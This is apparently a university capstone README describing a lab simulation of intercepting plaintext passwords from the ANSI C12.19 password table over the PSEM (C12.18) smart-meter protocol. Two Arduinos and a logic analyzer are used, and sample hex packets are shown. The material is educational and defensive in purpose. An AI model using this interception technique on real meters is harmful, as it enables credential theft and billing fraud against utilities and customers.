Smart grid devices, specifically electrical meters, adhere to the Protocol Specification for Electricity Meters (PSEM), which is defined by the ANSI C12.18 standard. C12.18 negotiates the transfer of data between a client electrical meter and a server, which allows for electrical companies to properly bill their customers. This standard transports unencrypted (plaintext) data, which is vulnerable to an interception attack. The ANSI C12.18 standard also relies on another standard for data storage in tables, ANSI C12.19.
C12.19 defines many tables for the operation of a meter, some of which may be exploited, but one stands out in particular as it holds user information. The password table contains user ID numbers, access levels, and, most importantly, passwords. C12.19 provides an option for basic encryption of these passwords in later revisions, but earlier implementations store them as plaintext. Even with encryption, brute-force password cracking may prove useful.
With this, the vulnerability is revealed. Assuming proper access to hardware, a bad actor can wait for a PSEM read request to be sent for the vulnerable password table. The plaintext passwords associated with their user ID numbers can then be intercepted. Once the password is intercepted, the attacker can send write requests to the server, causing the customer to be unfairly billed, for instance. This project simulates this attack.
- 2x - Arduino Mega 2560 microcontroller boards
- 1x - Logic Analyzer with support for reading UART lines
- 6x - Dupont breadboard jumper wires (connections depend on logic analyzer inputs)
- 1x - Computer to monitor serial data from Arduinos and output of logic analyzer
- Arduino IDE
- Logic Analyzer monitoring program (typically bundled with the logic analyzer)
- Plug both Arduino boards into a usb port for power and data transfer.
- Plug the logic analyzer into a usb port for power and data transfer.
- Connect the TX lines of one arduino to the RX line of the other arduino (repeat this step for both boards).
- Connect an alligator clip to the bottom of the wire connected to the RX line of the server.
- Connect an alligator clip to the bottom of the wire connected to the RX line of the client.
- Connect a wire to each alligator clip on one end, and to a channel of the logic analyzer on the other end (repeat for both boards).
- Clone this repository into its own directory
- Open two instances of the PSEM_Simulator Arduino sketch in two different Arduino IDE windows
- Connect both Arduino boards to the host computer
- Ensure both instances of the Arduino IDE have a different board (COM port) selected
- Designate one board as the client, and the other as the server
- In the Arduino IDE instance for the client board, ensure the PSEM_MODE macro in PSEM_Simulator.ino is set to CLIENT
- Verify and upload the program to the client board
- In the Arduino IDE instance for the server board, ensure the PSEM_MODE macro in PSEM_Simulator.ino is set to SERVER
- Verify and upload the program to the server board
- In both instances, start the Serial Monitor with the 9600 baud rate option
- The client instance should write "Starting in Client Mode" to its own serial output
- The server instance should write "Starting in Server Mode" to its own serial output
- Both the client and server should be ready and running at this time
- Connect the logic analyzer to the host computer
- Open the logic analyzer software
- Note: This is dependent on the logic analyzer chosen, and may vary between users
- Confirm that the logic analyzer is properly connected between the two boards and intercepting signals
- Note: This can be done by sending a PSEM ident request between the boards (see "Performing the Attack" for more details)
- Setup is complete
-
In the client instance serial monitor input, type an upper case "I" and press the "Enter" key
- This command sends a PSEM ident request from the client to the server
-
Ensure proper transmission of the packet by observing both the client and server serial monitor outputs
-
The client should display a message stating, "Successfully sent PSEM ident request."
-
The client should additionally display the bytes of the raw, transmitted PSEM packet in hex, preceded by "TX:", and encased between dashed lines
-
An example of the client's perspective can be seen below:
--------------------------------------------------- TX: EE 00 00 00 00 01 20 3D 38 --------------------------------------------------- Successfully sent PSEM ident request. -
The server should display a message stating, "Successfully received PSEM ident request."
-
The server should additionally display the bytes of the raw, received PSEM packet in hex, preceded by "RX:", and encased between dashed lines
-
An example of the server's perspective can be seen below:
--------------------------------------------------- RX: EE 00 00 00 00 01 20 3D 38 --------------------------------------------------- Successfully received PSEM ident request.
-
-
Observe the logic analyzer output
- The raw UART packet containing the ident request should be visible in the output of the logic analyzer software
- Note One: The data in the RAW UART packet will be different than the raw PSEM packet as UART contains additional protocol overhead with the data
- Note Two: The logic analyzer output will differ from user to user depending on which device is being used
-
Assuming proper setup, the outputs of these three components should match, or closely resemble the described outputs and the attack may continue
-
In the client instance serial monitor input, type an upper case "O" and press the "Enter" key
- Note One: "O" stands for "offset read", or a read request that asks for data from a specifc table
- Note Two: The offset read request is hard-coded to return only the passwords table for the sake of this simulation
- Note Three: This offset read request would actually be initiated by the electrical company, not the bad actor
- The bad actor would have to collect all incoming and outgoing data over a long period of time to hope to catch this packet
- The bad actor would only have access to a transmission source (wire, optical connection, wireless transmission, etc.)
- For the sake of this demonstration, the offset read request is isolated and initiated by the user performing the simulation
- Note Four: Confirmation of the packet's transmission should be oberserved in a similar manner to the PSEM ident request described in Part 1 of this section
-
An exmaple of the offset read request in the logic analyzer can be seen below:
EE 00 00 00 00 63 00 60 01 74 77 65 6E 74 79 6F 6E 65 63 68 61 72 61 63 74 65 72 70 77 64 01 03 00 E9 07 02 14 05 1E 00 02 74 77 65 6E 74 79 6F 6E 65 63 68 61 72 61 63 74 65 72 70 77 64 02 03 00 E9 07 02 14 05 1E 00 03 74 77 65 6E 74 79 6F 6E 65 63 68 61 72 61 63 74 65 72 70 77 64 03 03 00 E9 07 02 14 05 1E 00 C1 14 AA
This project was developed as a capstone submission for CS 4404, Tools and Techniques in Computer Network Security, at Worcester Polytechnic Institute.